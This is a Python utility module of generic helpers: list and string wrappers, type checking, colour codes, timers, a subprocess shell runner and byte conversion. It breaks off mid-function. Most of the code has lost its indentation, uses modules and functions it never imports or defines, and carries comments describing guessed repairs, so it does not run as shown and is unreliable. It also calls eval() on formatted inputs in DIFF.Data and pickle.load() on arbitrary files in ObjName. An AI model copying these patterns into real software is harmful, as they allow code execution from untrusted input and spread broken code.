import fnmatch
import pickle
import select  # used by IP.Ping below; tarfile/zipfile/pickle/random were imported twice above
import inspect
import base64
import hashlib
import importlib
import subprocess
import traceback
import fcntl,socket,struct
import json as _json
import email.utils
import xml.etree.ElementTree as ET
from sys import modules
from sys import path as mod_path
from sys import version_info
from pprint import pprint
from threading import Thread
from datetime import datetime
from email import encoders
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from multiprocessing import Process, Queue
from distutils.spawn import find_executable
from distutils.version import LooseVersion
from kmisc.Import import *
Import('from lz4 import frame')
Import('import bz2')
Import('import magic')
from http.cookies import Morsel # This module for requests when you use build by pyinstaller command
Import('import requests')
url_group = re.compile(r'^(https|http|ftp)://([^/\r\n]+)(/[^\r\n]*)?')
# ANSI escape stripper used by SHELL.Run(ansi=False); the original module
# referenced ansi_escape without defining it, so a standard CSI pattern is assumed here.
ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
#log_file=None
log_intro=3
log_new_line='\n'
pipe_file=None
cdrom_ko=['sr_mod','cdrom','libata','ata_piix','ata_generic','usb-storage']
def Global():
return dict(inspect.getmembers(inspect.stack()[-1][0]))["f_globals"]
def OutFormat(data,out=None):
    if out in [tuple,'tuple']:
        if isinstance(data,tuple):
            return data
        if isinstance(data,list):
            return tuple(data)
        return (data,)
    elif out in [list,'list']:
        if isinstance(data,list):
            return data
        if isinstance(data,tuple):
            return list(data)
        return [data]
    elif out in ['raw',None]:
        if isinstance(data,(list,tuple)) and len(data) == 1:
            return data[0]
        elif isinstance(data,dict) and len(data) == 1:
            return list(data.values())[0]
elif out in ['str',str]:
return '''{}'''.format(data)
elif out in ['int',int]:
try:
return int(data)
except:
pass
return data
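# Usage sketch for OutFormat (behavior per the branches above):
#   >>> OutFormat(5, out=list)        # scalar wrapped
#   [5]
#   >>> OutFormat((1, 2), out=list)   # tuple converted
#   [1, 2]
#   >>> OutFormat([7], out='raw')     # single-element container unwrapped
#   7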
def Abs(*inps,**opts):
default=opts.get('default',None)
out=opts.get('out','auto')
obj=opts.get('obj',None)
err=opts.get('err',True)
def int_idx(idx,nobj,default,err,out='auto'):
if idx < 0:
if abs(idx) <= nobj:
if out in ['list',list]:
return [nobj+idx]
elif out in ['tuple',tuple]:
return (nobj+idx,)
return nobj+idx
elif err not in [True,'err','True']:
return 0
else:
if nobj > idx:
if out in ['list',list]:
return [idx]
elif out in ['tuple',tuple]:
return (idx,)
return idx
elif err not in [True,'err','True']:
return nobj-1
return default
if len(inps) > 0:
ss=None
ee=None
rt=[]
if obj is None:
for i in inps:
if isinstance(i,int):
rt.append(abs(i))
elif err in [True,'err','True']:
rt.append(default)
# elif isinstance(obj,dict):
# keys=list(obj)
# for idx in inps:
# if isinstance(idx,int):
# int_index=int_idx(idx,len(keys),default,err)
# if int_index != default: rt.append(keys[int_index])
# elif isinstance(idx,tuple) and len(idx) == 2:
# ss=Abs(idx[0],**opts)
# ee=Abs(idx[1],**opts)
# for i in range(ss,ee+1):
# rt.append(keys[i])
# elif isinstance(idx,str):
# try:
# idx=int(idx)
# rt.append(int_idx(idx,len(keys),default,err))
# except:
# if len(idx.split(':')) == 2:
# ss,ee=tuple(idx.split(':'))
# if isinstance(ss,int) and isinstance(ee,int):
# for i in range(ss,ee+1):
# rt.append(keys[i])
# elif len(idx.split('-')) == 2:
# ss,ee=tuple(idx.split('-'))
# if isinstance(ss,int) and isinstance(ee,int):
# for i in range(ss,ee+1):
# rt.append(keys[i])
# elif len(idx.split('|')) > 1:
# rt=rt+idx.split('|')
elif isinstance(obj,(list,tuple,str)):
nobj=len(obj)
for idx in inps:
if isinstance(idx,list):
for ii in idx:
if isinstance(ii,int):
if nobj > ii:
rt.append(ii)
else:
rt.append(OutFormat(default))
elif isinstance(idx,int):
rt.append(int_idx(idx,nobj,default,err))
elif isinstance(idx,tuple) and len(idx) == 2:
ss=Abs(idx[0],**opts)
ee=Abs(idx[1],**opts)
rt=rt+list(range(ss,ee+1))
elif isinstance(idx,str):
try:
idx=int(idx)
rt.append(int_idx(idx,nobj,default,err))
except:
if len(idx.split(':')) == 2:
ss,ee=tuple(idx.split(':'))
ss=Abs(ss,**opts)
ee=Abs(ee,**opts)
if isinstance(ss,int) and isinstance(ee,int):
rt=rt+list(range(ss,ee+1))
elif len(idx.split('-')) == 2:
ss,ee=tuple(idx.split('-'))
ss=Abs(ss,**opts)
ee=Abs(ee,**opts)
if isinstance(ss,int) and isinstance(ee,int):
rt=rt+list(range(ss,ee+1))
elif len(idx.split('|')) > 1:
for i in idx.split('|'):
ss=Abs(i,obj=obj,out='raw')
if isinstance(ss,int):
rt.append(ss)
else:
rt.append(OutFormat(default))
return OutFormat(rt,out=out)
elif obj:
if isinstance(obj,(list,tuple,str)):
return len(obj)
elif isinstance(obj,dict):
return list(obj.keys())
return default
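# Usage sketch for Abs (index normalization against an object):
#   >>> Abs(-1, obj=['a', 'b', 'c'], out='raw')   # negative index resolved
#   2
#   >>> Abs(1, -1, obj='abcd', out=list)          # several indexes at once
#   [1, 3]
#   >>> Abs(obj=[1, 2, 3])                        # no index given: length of the object
#   3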
def ObjName(obj,default=None):
if isinstance(obj,str):
if os.path.isfile(obj):
            with open(obj,'rb') as f:
                aa=magic.from_buffer(f.read(2048))
            if aa: return aa.split()[0].lower()
try:
with open(obj,'rb') as f: # Pickle Type
pickle.load(f)
return 'pickle'
except:
pass
return 'str'
else:
obj_dir=dir(obj)
obj_name=type(obj).__name__
if obj_name in ['function']: return obj_name
if '__dict__' in obj_dir:
if obj_name == 'type': return 'classobj'
return 'instance'
# elif obj_name == 'type':
# return obj.__name__
return obj_name.lower() # Object Name
return default
#def TypeFixer(name,default=None):
def TypeFixer(obj,default='unknown'):
if obj == default: return default
if isinstance(obj,str):
name=obj.lower()
else:
name=ObjName(obj).lower()
# Fix short word to correct name
if name in ['none']: return 'nonetype'
if name in ['byte']: return 'bytes'
if name in ['obj']: return 'object'
if name in ['func','unboundmethod']: return 'function'
if name in ['class']: return 'classobj'
if name in ['yield']: return 'generator'
if name in ['builtinfunction','builtinmethod','builtin_function_or_method']: return 'builtin_function_or_method'
# function: function and instance's function in Python3
# method: class's function in Python3
# instancemethod: instance's and class's function in Python2
if name in ['method','classfunction','instancemethod','unboundmethod']: return 'method' # function in the class
# it changed name between python versions, so return both name for this name
if name in ['dictproxy','mappingproxy']: return ['dictproxy','mappingproxy'] # function in the class
# Fix python version for long
if name in ['long']:
if sys.version_info[0] < 3: return name
return 'int'
if not isinstance(obj,str) and name == 'type':
return obj.__name__.lower()
# return original name
return name
def Type(*inp,**opts):
'''
instance: <class name>()
classobj : <class name>
function : <func name>
return value: <func name>()
method : <class name>().<func name>
'''
inpn=len(inp)
default=opts.get('default','unknown')
if inpn == 0: return default
obj=inp[0]
if inpn == 1: return TypeFixer(obj,default=default)
chk_type=[]
for name in inp[1:]:
if not isinstance(name,(tuple,list)): name=[name]
for ii in name:
a=TypeFixer(TypeFixer(ii,default=default),default=default)
if a == default: continue
if isinstance(a,list):
chk_type=chk_type+a
elif a not in chk_type:
chk_type.append(a)
if chk_type:
obj_type=ObjName(obj)
# print(' ::',obj_type,' in ',chk_type)
if obj_type == default: return default
if obj_type == 'instance':
if 'int' in chk_type:
if isinstance(obj,int): return True
elif 'dict' in chk_type:
if isinstance(obj,dict): return True
elif 'list' in chk_type:
if isinstance(obj,list): return True
elif 'tuple' in chk_type:
if isinstance(obj,tuple): return True
elif 'float' in chk_type:
if isinstance(obj,float): return True
if obj_type in chk_type: return True
return False
def Copy(src):
    if isinstance(src,(list,tuple)): return src[:]
if isinstance(src,dict): return src.copy()
if isinstance(src,str): return '{}'.format(src)
if isinstance(src,int): return int('{}'.format(src))
if isinstance(src,float): return float('{}'.format(src))
if PyVer(2):
if isinstance(src,long): return long('{}'.format(src))
class COLOR:
def __init__(self,**opts):
self.color_db=opts.get('color',{'blue': 34, 'grey': 30, 'yellow': 33, 'green': 32, 'cyan': 36, 'magenta': 35, 'white': 37, 'red': 31})
self.bg_color_db=opts.get('bg',{'cyan': 46, 'white': 47, 'grey': 40, 'yellow': 43, 'blue': 44, 'magenta': 45, 'red': 41, 'green': 42})
self.attr_db=opts.get('attr',{'reverse': 7, 'blink': 5,'concealed': 8, 'underline': 4, 'bold': 1})
def Color_code(self,name,default=None):
return self.color_db.get(name,default)
    def Background_code(self,name,default=None):
        return self.bg_color_db.get(name,default)
    def Attr_code(self,name,default=None):
        return self.attr_db.get(name,default)
def Get(self,color,mode='color',default=None):
color_code=None
if mode == 'color':
color_code=self.Color_code(color,default=default)
elif mode in ['background','bg']:
color_code=self.Background_code(color,default=default)
elif mode in ['attr','attribute']:
color_code=self.Attr_code(color,default=default)
return color_code
def String(self,msg,color,bg=False,attr=False,mode='shell'):
if mode in ['html','HTML']:
if bg:
                return '''<p style="background-color: {}">{}</p>'''.format(color,msg)
else:
return '''<font color={}>{}</font>'''.format(color,msg)
else:
if bg:
color_code=self.Get(color,mode='bg',default=None)
elif attr:
color_code=self.Get(color,mode='attr',default=None)
else:
color_code=self.Get(color,default=None)
if color_code is None:
return msg
if os.getenv('ANSI_COLORS_DISABLED') is None:
reset='''\033[0m'''
fmt_msg='''\033[%dm%s'''
msg=fmt_msg % (color_code,msg)
return msg+reset
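# Usage sketch for COLOR (ANSI escape wrapping; honors ANSI_COLORS_DISABLED):
#   >>> COLOR().String('alert', 'red')
#   '\x1b[31malert\x1b[0m'
#   >>> COLOR().String('note', 'green', mode='html')
#   '<font color=green>note</font>'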
class FIND:
def __init__(self,string,out='index',word=False):
string=string.replace('*','.+').replace('?','.')
if word:
self.find_re=re.compile(r'\b({0})\b'.format(string),flags=re.IGNORECASE)
else:
self.find_re=re.compile(string,flags=re.IGNORECASE)
self.out=out
def From(self,data,symbol='\n'):
rt=[]
def Search(data,key,rt):
found=self.find_re.findall(data)
if found:
if self.out in ['found']:
rt=rt+found
elif self.out in ['index','idx','key']:
rt.append(key)
elif self.out in ['all','*']:
rt.append((key,data))
else:
rt.append(data)
return rt
if Type(data,str):
data=data.split(symbol)
if Type(data,list,tuple):
for i in range(0,len(data)):
if Type(data[i],(list,tuple,dict)):
sub=self.From(data[i],symbol=symbol)
if sub:
if self.out in ['key','index','idx']:
for z in sub:
rt.append('{}/{}'.format(i,z))
else:
rt=rt+sub
elif Type(data[i],str):
rt=Search(data[i],i,rt)
elif Type(data,dict):
for i in data:
if Type(data[i],(list,tuple,dict)):
sub=self.From(data[i],symbol=symbol)
if sub:
if self.out in ['key','index','idx']:
for z in sub:
rt.append('{}/{}'.format(i,z))
else:
rt=rt+sub
elif Type(data[i],str):
rt=Search(data[i],i,rt)
else:
return 'Unknown format'
return rt
def Find(self,src,find,prs=None,sym='\n',pattern=True,default=[],out=None,findall=False,word=False,mode='value'):
#if Type(src,'instance','classobj'):
# if src is instance or classobj then search in description and made function name at key
        if isinstance(src,(list,tuple)):
            rt=[]
            finds=find if isinstance(find,(list,tuple)) else [find]
            for i in range(0,len(src)):
                for j in finds:
                    j=j.replace('*','.+').replace('?','.')
                    mm=re.compile(j)
                    if bool(re.match(mm,src[i])):
                        if mode in ['index','idx']:
                            rt.append(i)
                        else:
                            rt.append(src[i])
            if len(rt):
                return rt
        elif isinstance(src,dict):
            path=[]
            # assumption: the original referenced an undefined 'dep'; the otherwise
            # unused 'prs' parameter is treated as that nested key name here
            dep=prs
            for key in src:
                if mode in ['key','*','all']: # find in key only
                    if find == key:
                        path.append(key)
                found=src.get(key,None)
                if isinstance(found,dict):
                    if dep in found:
                        if mode in ['value','*','all'] and (find == found[dep] or (isinstance(found[dep],(dict,list,tuple)) and find in found[dep]) or (isinstance(find,str) and isinstance(found[dep],str) and find in found[dep])):
                            # value match on the nested key
                            path.append(key)
                        elif isinstance(found[dep], dict): # recursing
                            path=path+self.Find(found[dep],find,prs=prs,mode=mode)
                    else:
                        if mode in ['value','*','all'] and (find == found or (isinstance(found,(list,tuple)) and find in found) or (isinstance(find,str) and isinstance(found,str) and find in found)):
                            path.append(key)
                        else:
                            for kk in self.Find(src[key],find,prs=prs,mode=mode): # recursing
                                path.append(key+'/'+kk)
                else:
                    if mode in ['value','*','all'] and (find == found or (isinstance(found,(list,tuple)) and find in found) or (isinstance(find,str) and isinstance(found,str) and find in found)):
                        path.append(key)
            return path
elif isinstance(src,str):
if word:
find_re=re.compile(r'\b({0})\b'.format(find),flags=re.IGNORECASE)
else:
find_re=re.compile(find,flags=re.IGNORECASE)
if findall:
match=find_re.findall(src)
if match: return OutFormat(match,out=out)
else:
match=find_re.search(src)
if match: return OutFormat([match.group()],out=out)
return OutFormat(default,out=out)
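# Usage sketch for FIND (glob-ish, case-insensitive search over nested data):
#   >>> FIND('err*', out='found').From('error one\nok\nerrand')
#   ['error one', 'errand']
#   >>> FIND('err*', out='index').From(['ok', 'error'])
#   [1]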
class DIFF:
def __init__(self):
pass
def Data(self,a,sym,b,ignore=None,default=None):
if isinstance(ignore,(list,tuple)):
if a in ignore or b in ignore:
return default
        elif ignore is not None:
            if a == ignore or b == ignore:
                return default
if sym == '==':
try:
return eval('{} == {}'.format(a,b))
except:
return default
elif isinstance(a,int) and isinstance(b,int):
try:
return eval('{} {} {}'.format(a,sym,b))
except:
return default
elif isinstance(a,str) and isinstance(b,str) and a.isdigit() and b.isdigit():
try:
return eval('{} {} {}'.format(a,sym,b))
except:
return default
return default
def Code(self):
pass
def File(self):
pass
class LIST(list):
def __init__(self,*inps):
if len(inps) == 1 and isinstance(inps[0],(list,tuple)):
self.root=list(inps[0])
else:
self.root=list(inps)
# def __new__(cls,*inps):
# if len(inps) == 1 and isinstance(inps[0],(list,tuple)):
# return list(inps[0])
# else:
# return list(inps)
# reply self.root back to the Class's output a=List(['a']), return the data to a
def __repr__(self):
return repr(self.root)
def Convert(self,src,path=False,default=False,symbol=':white_space:',**opts):
if isinstance(src,str) and src:
if path and isinstance(symbol,str):
if symbol == ':white_space:':
symbol='/'
start=0
if src[0] == symbol:
start=1
if src[-1] == symbol:
return src.split(symbol)[start:-1]
return src.split(symbol)[start:]
else:
if symbol == ':white_space:':
return src.strip().split()
elif isinstance(symbol,str):
return src.split(symbol)
elif isinstance(symbol,(tuple,list)):
regexPattern = '|'.join(map(re.escape,tuple(symbol)))
return re.split(regexPattern,src)
return default
elif isinstance(src,(list,tuple)):
return list(src)
else:
return [src]
def Append(self,*inps,**opts):
uniq=opts.get('uniq',False)
symbol=opts.get('symbol',':white_space:')
path=opts.get('path',False)
default=opts.get('default',False)
for pp in inps:
for rp in self.Convert(pp,symbol=symbol,path=path,default=default):
if rp == default: continue
if uniq and rp in self.root: continue
if path:
if rp == '.': continue
if rp == '..' and len(self.root):
del self.root[-1]
continue
self.root.append(rp)
return self.root
def append(self,inp):
self.root.append(inp)
    def Uniq(self,*inps,**opts):
        symbol=opts.get('symbol',':white_space:')
        path=opts.get('path',False)
        default=opts.get('default',False)
        rt=[]
        for pp in self.root + list(inps):
            for rp in self.Convert(pp,symbol=symbol,path=path,default=default):
                if rp == default: continue
                if rp in rt: continue
                if path:
                    if rp == '.': continue
                    if rp == '..' and len(rt):
                        del rt[-1]
                        continue
                rt.append(rp)
        self.root=rt
        return self.root
def Delete(self,*inps,**opts):
find=opts.get('find','index')
default=opts.get('default',False)
if find in ['data','element']:
for i in inps:
if i in self.root:
self.root.remove(i)
else:
if len(inps) == 1 and isinstance(inps[0],int):
if len(self.root) > inps[0]:
del self.root[inps[0]]
else:
rt=[]
del_list=Abs(*inps,obj=self.root,out=list)
for i in range(0,len(self.root)):
if i in del_list: continue
rt.append(self.root[i])
self.root=rt
def Get(self,*inps,**opts):
if not inps: return self.root
find=opts.get('find','data')
default=opts.get('default',None)
out=opts.get('out',list)
err=opts.get('err',False)
if len(self.root) == 0 and err:
return default
rt=[]
if find in ['index','idx']:
for i in inps:
if i in self.root:
rt.append(self.root.index(i))
elif err is True:
rt.append(default)
else:
for i in Abs(*inps,obj=self.root,err=err,out=list,default=None):
if isinstance(i,int) and self.root:
rt.append(self.root[i])
elif err is True:
return default
if rt:
if out in [list,'list']:
return rt
elif out in [tuple,'tuple']:
return tuple(rt)
elif out in [None,'raw']:
if len(rt) == 1:
return rt[0]
return rt
return default
def Index(self,*inps):
return self.Get(*inps,find='index')
    def Insert(self,*inps,**opts):
        at=opts.get('at',0)
        default=opts.get('default',False)
        err=opts.get('err',False)
        if isinstance(at,str):
            if at in ['start','first']: self.root=list(inps)+self.root
            if at in ['end','last']: self.root=self.root+list(inps)
        elif len(self.root) == 0:
            self.root=list(inps)
        elif isinstance(at,int) and len(self.root) > at:
            self.root=self.root[:at]+list(inps)+self.root[at:]
        else:
            if err:
                return default
            self.root=self.root+list(inps)
def Update(self,*inps,**opts):
at=opts.get('at',0)
err=opts.get('err',False)
default=opts.get('default',False)
n=len(self.root)
if n == 0:
if err is True:
return default
else:
self.root=list(inps)
elif isinstance(at,int) and n > at:
for i in range(0,len(inps)):
if n > at+i:
self.root[at+i]=inps[i]
elif err is True:
return default
else:
self.root=self.root+list(inps)[i:]
break
elif isinstance(at,(tuple,list)):
if len(inps) == len(at):
for i in range(0,len(at)):
if isinstance(at[i],int) and n > at[i]:
self.root[at[i]]=inps[i]
elif err is True:
return default
else:
self.root.append(inps[i])
def Find(self,*inps,**opts):
find=opts.get('find','index')
default=opts.get('default',[])
rt=[]
for i in range(0,len(self.root)):
for j in inps:
j=j.replace('*','.+').replace('?','.')
mm=re.compile(j)
if bool(re.match(mm,self.root[i])):
if find in ['index','idx']:
rt.append(i)
else:
rt.append(self.root[i])
if len(rt):
return rt
return default
def Copy(self):
return self.root[:]
def copy(self):
return self.root[:]
def Tuple(self):
return tuple(self.root)
def Move2first(self,find):
if isinstance(find,(list,tuple)):
self.Delete(*find,find='data')
self.root=list(find)+self.root
else:
self.Delete(*(find,),find='data')
self.root=[find]+self.root
return self.root
def Move2end(self,find):
if isinstance(find,(list,tuple)):
self.Delete(*find,find='data')
self.root=self.root+list(find)
else:
self.Delete(*(find,),find='data')
self.root=self.root+[find]
return self.root
def Sort(self,reverse=False,func=None,order=None,field=None):
if order in [int,'int','digit','number']:
def _cint_(e):
try:
if isinstance(field,int):
if isinstance(e,(list,tuple)) and len(e) > field:
return int(e[field])
else:
return 9999999
return int(e)
except:
return e
return self.root.sort(reverse=reverse,key=_cint_)
elif order in [str,'str']:
def _cint_(e):
if isinstance(field,int):
if isinstance(e,(list,tuple)) and len(e) > field:
return '''{}'''.format(e[field])
else:
return 'zzzzzzzzz'
return '''{}'''.format(e)
return self.root.sort(reverse=reverse,key=_cint_)
else:
if isinstance(field,int):
                def _cint_(e):
                    if isinstance(e,(list,tuple)) and len(e) > field:
                        return e[field]
                    return e
return self.root.sort(reverse=reverse,key=_cint_)
else:
return self.root.sort(reverse=reverse,key=func)
    def Str(self,sym=' ',default=None):
        if isinstance(self.root,(tuple,list)):
            rt_str=''
            for ii in self.root:
                if rt_str:
                    rt_str='''{}{}{}'''.format(rt_str,sym,ii)
                else:
                    rt_str='''{}'''.format(ii)
            return rt_str
        return default
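# Usage sketch for LIST (list wrapper with string-splitting Append):
#   >>> l = LIST('a', 'b')
#   >>> l.Append('c d')          # default symbol splits on whitespace
#   ['a', 'b', 'c', 'd']
#   >>> l.Get(-1, out='raw')
#   'd'
#   >>> l.Str(sym=',')
#   'a,b,c,d'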
class STR(str):
def __init__(self,src):
self.src=src
def Rand(self,length=8,strs=None,mode='*'):
return Random(length=length,strs=strs,mode=mode)
def Cut(self,head_len=None,body_len=None,new_line='\n',out=str):
if not isinstance(self.src,str):
self.src='''{}'''.format(self.src)
source=self.src.split(new_line)
        if (len(source) == 1 and not head_len) or (head_len and head_len >= len(self.src)):
            return [self.src]
rt=[]
for src_idx in range(0,len(source)):
str_len=len(source[src_idx])
if not body_len:
rt=rt+[source[src_idx][i:i + head_len] for i in range(0, str_len, head_len)]
else:
if src_idx == 0:
rt.append(source[src_idx][0:head_len]) # Take head
if str_len > head_len:
rt=rt+[source[src_idx][head_len:][i:i + body_len] for i in range(0, str_len-head_len, body_len)]
## Cut body
#string_tmp=self.src[head_len:]
#string_tmp_len=len(string_tmp)
#for i in range(0, int(string_tmp_len/body_len)+1):
# if (i+1)*body_len > string_tmp_len:
# rt.append(string_tmp[body_len*i:])
# else:
# rt.append(string_tmp[body_len*i:(i+1)*body_len])
else:
rt=rt+[source[src_idx][i:i + body_len] for i in range(0, str_len, body_len)]
if rt and out in ['str',str]: return new_line.join(rt)
return rt
    def Space(self,num=1,fill=' ',mode='space'):
if mode.lower() =='tap':
fill='\t'
tap=''
for i in range(0,num):
tap=tap+fill
return tap
def Tap(self,space='',sym='\n',default=None,NFLT=False,out=str):
# No First Line Tap (NFLT)
if isinstance(space,int):
space=self.Space(space)
if isinstance(self.src,str):
self.src=self.src.split(sym)
if isinstance(self.src,(list,tuple)):
rt=[]
if NFLT:
rt.append(self.src.pop(0))
for ii in self.src:
rt.append('%s%s'%(space,ii))
if rt and out in [str,'str']: return sym.join(rt)
return rt
return default
def Wrap(self,src=None,space='',space_mode='space',sym='\n',default=None,NFLT=False,out=str):
if src is None: src=self.src
if not isinstance(src,(str,list,tuple)): return src
if isinstance(src,str): src=src.split(sym)
if isinstance(space,int): space=self.Space(space,mode=space_mode)
rt=[]
# No First Line Tap (NFLT)
if NFLT: rt.append('%s'%(src.pop(0)))
for ii in src:
rt.append('%s%s'%(space,ii))
if rt and out in [str,'str']: return sym.join(rt)
return rt
def Reduce(self,start=0,end=None,sym=None,default=None):
if isinstance(self.src,str):
if sym:
arr=self.src.split(sym)
if isinstance(end,int):
return sym.join(arr[start:end])
                else:
                    return sym.join(arr[start:])
else:
if isinstance(end,int):
return self.src[start:end]
else:
return self.src[start:]
return default
def Find(self,find,src=None,prs=None,sym='\n',pattern=True,default=[],out=None,findall=False,word=False):
if src is None: src=self.src
return FIND().Find(src,find,prs=prs,sym=sym,pattern=pattern,default=default,out=out,findall=findall,word=word,mode='value')
def Index(self,find,start=None,end=None,sym='\n',default=[],word=False,pattern=False,findall=False,out=None):
if not isinstance(self.src,str): return default
rt=[]
source=self.src.split(sym)
for row in range(0,len(source)):
for ff in self.Find(find,src=source[row],pattern=pattern,word=word,findall=findall,default=[],out=list):
if findall:
rt=rt+[(row,[m.start() for m in re.finditer(ff,source[row])])]
else:
idx=source[row].index(ff,start,end)
if idx >= 0:
rt.append((row,idx))
if rt:
if out in ['tuple',tuple]: return tuple(rt)
            if out not in ['list',list] and len(rt) == 1 and rt[0][0] == 0:
                if isinstance(rt[0][1],(list,tuple)) and len(rt[0][1]) == 1: return rt[0][1][0]
                return rt[0][1]
return rt
return default
def Replace(self,replace_what,replace_to,default=None):
if isinstance(self.src,str):
if replace_what[-1] == '$' or replace_what[0] == '^':
return re.sub(replace_what, replace_to, self.src)
else:
head, _sep, tail = self.src.rpartition(replace_what)
return head + replace_to + tail
return default
def Split(self,sym,src=None,default=None):
if not isinstance(sym,str): return default
if src is None: src=self.src
if isinstance(src,str):
if isinstance(sym,bytes): sym=CONVERT(sym).Str()
elif isinstance(src,bytes):
if isinstance(sym,str): sym=BYTES().From(sym,default={'org'})
else:
return src
if len(sym) > 2 and '|' in sym:
try:
sym_a=sym.split('|')
for i in ['.','+','*']:
try:
x=sym_a.index(i)
                        sym_a[x]='\\{}'.format(sym_a[x])
except:
continue
return re.split('|'.join(sym_a),src) # splited by '|' or expression
except:
pass
return src.split(sym)
# def Split(self,sym=None):
# if isinstance(self.src,str):
# try:
# return re.split(sym,self.src) # splited by '|' or expression
# except:
# return self.src.split(sym)
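# Usage sketch for STR (string helpers; Cut keeps a short head then fixed body chunks):
#   >>> STR('abcdef').Cut(head_len=2, body_len=3, out=list)
#   ['ab', 'cde', 'f']
#   >>> STR('x\ny').Tap(space=2)      # indents each line with two spaces
#   '  x\n  y'
#   >>> STR('a-b_c').Split('-|_')     # '|' separates alternative split symbols
#   ['a', 'b', 'c']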
class TIME:
def __init__(self):
self.init_sec=int(datetime.now().strftime('%s'))
def Reset(self):
self.init_sec=int(datetime.now().strftime('%s'))
def Sleep(self,try_wait=None,default=1):
if isinstance(try_wait,(int,str)): try_wait=(try_wait,)
if isinstance(try_wait,(list,tuple)) and len(try_wait):
if len(try_wait) == 2:
try:
time.sleep(random.randint(int(try_wait[0]),int(try_wait[1])))
except:
pass
else:
try:
time.sleep(int(try_wait[0]))
except:
pass
else:
time.sleep(default)
def Rand(self,try_wait=None,default=1):
if isinstance(try_wait,(int,str)): try_wait=(try_wait,)
if isinstance(try_wait,(list,tuple)) and len(try_wait):
if len(try_wait) == 2:
try:
return random.randint(int(try_wait[0]),int(try_wait[1]))
except:
pass
else:
try:
return int(try_wait[0])
except:
pass
return default
def Int(self):
return int(datetime.now().strftime('%s'))
def Now(self,mode=None):
if mode in [int,'int','INT','sec']:return self.Int()
        return datetime.now()
def Out(self,timeout_sec,default=(24*3600)):
try:
timeout_sec=int(timeout_sec)
except:
timeout_sec=default
if timeout_sec == 0:
return False
if self.Int() - self.init_sec > timeout_sec:
return True
return False
def Format(self,time=0,tformat='%s',read_format='%S'):
if time in [0,'0',None]:
return datetime.now().strftime(tformat)
elif isinstance(time,int) or (isinstance(time,str) and time.isdigit()):
#if type(time) is int or (type(time) is str and time.isdigit()):
if read_format == '%S':
return datetime.fromtimestamp(int(time)).strftime(tformat)
else:
return datetime.strptime(str(time),read_format).strftime(tformat)
def Init(self):
return self.init_sec
def Time(self):
return time.time()
def Datetime(self):
        return datetime.now()
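# Usage sketch for TIME (epoch-second helper; Out() is an elapsed-time test):
#   t = TIME()            # records the current epoch second
#   ...
#   if t.Out(300):        # True once more than 300s have passed since construction
#       pass              # handle the timeout (placeholder)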
class SHELL:
def __init__(self):
pass
def Pprog(self,stop,progress_pre_new_line=False,progress_post_new_line=False,log=None,progress_interval=5):
TIME().Sleep(progress_interval)
if stop():
return
if progress_pre_new_line:
if log:
log('\n',direct=True,log_level=1)
else:
sys.stdout.write('\n')
sys.stdout.flush()
post_chk=False
while True:
if stop():
break
if log:
log('>',direct=True,log_level=1)
else:
sys.stdout.write('>')
sys.stdout.flush()
post_chk=True
TIME().Sleep(progress_interval)
if post_chk and progress_post_new_line:
if log:
log('\n',direct=True,log_level=1)
else:
sys.stdout.write('\n')
sys.stdout.flush()
def Run(self,cmd,timeout=None,ansi=True,path=None,progress=False,progress_pre_new_line=False,progress_post_new_line=False,log=None,progress_interval=5):
start_time=TIME()
if not isinstance(cmd,str):
            return -1,'wrong command information :{0}'.format(cmd),'',start_time.Init(),start_time.Now(int),cmd,path
Popen=subprocess.Popen
PIPE=subprocess.PIPE
cmd_env=''
cmd_a=cmd.split()
cmd_file=cmd_a[0]
if cmd_a[0] == 'sudo': cmd_file=cmd_a[1]
if path and isinstance(path,str) and os.path.isdir(path) and os.path.isfile(os.path.join(path,cmd_file)):
cmd_env='''export PATH=%s:${PATH}; '''%(path)
            cmd_env=cmd_env+'''cd %s && '''%(path)
elif cmd_file[0] != '/' and cmd_file == os.path.basename(cmd_file) and os.path.isfile(cmd_file):
cmd_env='./'
p = Popen(cmd_env+cmd , shell=True, stdout=PIPE, stderr=PIPE)
out=None
err=None
if progress:
stop_threads=False
ppth=Thread(target=self.Pprog,args=(lambda:stop_threads,progress_pre_new_line,progress_post_new_line,log,progress_interval))
ppth.start()
if isinstance(timeout,(int,str)):
try:
timeout=int(timeout)
except:
timeout=600
if timeout < 3:
timeout=3
if PyVer(3):
try:
out, err = p.communicate(timeout=timeout)
except subprocess.TimeoutExpired:
p.kill()
if progress:
stop_threads=True
ppth.join()
return -1, 'Kill process after timeout ({0} sec)'.format(timeout), 'Error: Kill process after Timeout {0}'.format(timeout),start_time.Init(),start_time.Now(int),cmd,path
else:
if isinstance(timeout,int):
countdown=int('{}'.format(timeout))
while p.poll() is None and countdown > 0:
TIME().Sleep(2)
countdown -= 2
if countdown < 1:
p.kill()
if progress:
stop_threads=True
ppth.join()
return -1, 'Kill process after timeout ({0} sec)'.format(timeout), 'Error: Kill process after Timeout {0}'.format(timeout),start_time.Init(),start_time.Now(int),cmd,path
out, err = p.communicate()
if progress:
stop_threads=True
ppth.join()
if PyVer(3):
out=out.decode("ISO-8859-1")
err=err.decode("ISO-8859-1")
if ansi:
return p.returncode, out.rstrip(), err.rstrip(),start_time.Init(),start_time.Now(int),cmd,path
else:
return p.returncode, ansi_escape.sub('',out).rstrip(), ansi_escape.sub('',err).rstrip(),start_time.Init(),start_time.Now(int),cmd,path
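# Usage sketch for SHELL.Run (7-tuple: rc, stdout, stderr, start, end, cmd, path):
#   rc, out, err, start, end, cmd, path = SHELL().Run('echo hi', timeout=10)
#   # rc == 0 and out == 'hi' on success; rc == -1 with a kill message on timeout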
class BYTES:
def __init__(self,src=None,encode='utf-8',default='org'):
'''encode: utf-8(basic),latin1(enhance),windows-1252'''
self.src=src
self.encode=encode
self.default=default
def From(self,src,default='_._'):
self.src=src
if default=='_._': default=self.default
return self.Bytes(encode=self.encode,default=default)
def Bytes(self,encode='utf-8',default='org'):
def _bytes_(src,encode,default='org'):
try:
if PyVer(3):
if isinstance(src,bytes):
return src
else:
return bytes(src,encode)
return bytes(src) # if change to decode then network packet broken
except:
if default == 'org' or default =={'org'}:
return src
return default
tuple_data=False
if isinstance(self.src,tuple):
self.src=list(self.src)
tuple_data=True
if isinstance(self.src,list):
for i in range(0,len(self.src)):
self.src[i]=_bytes_(self.src[i],encode,default)
if tuple_data:
return tuple(self.src)
else:
return self.src
else:
return _bytes_(self.src,encode,default)
def Str(self,encode='latin1',default='org'): # or windows-1252
def _byte2str_(src,encode,default='org'):
if PyVer(3) and isinstance(src,bytes):
return src.decode(encode)
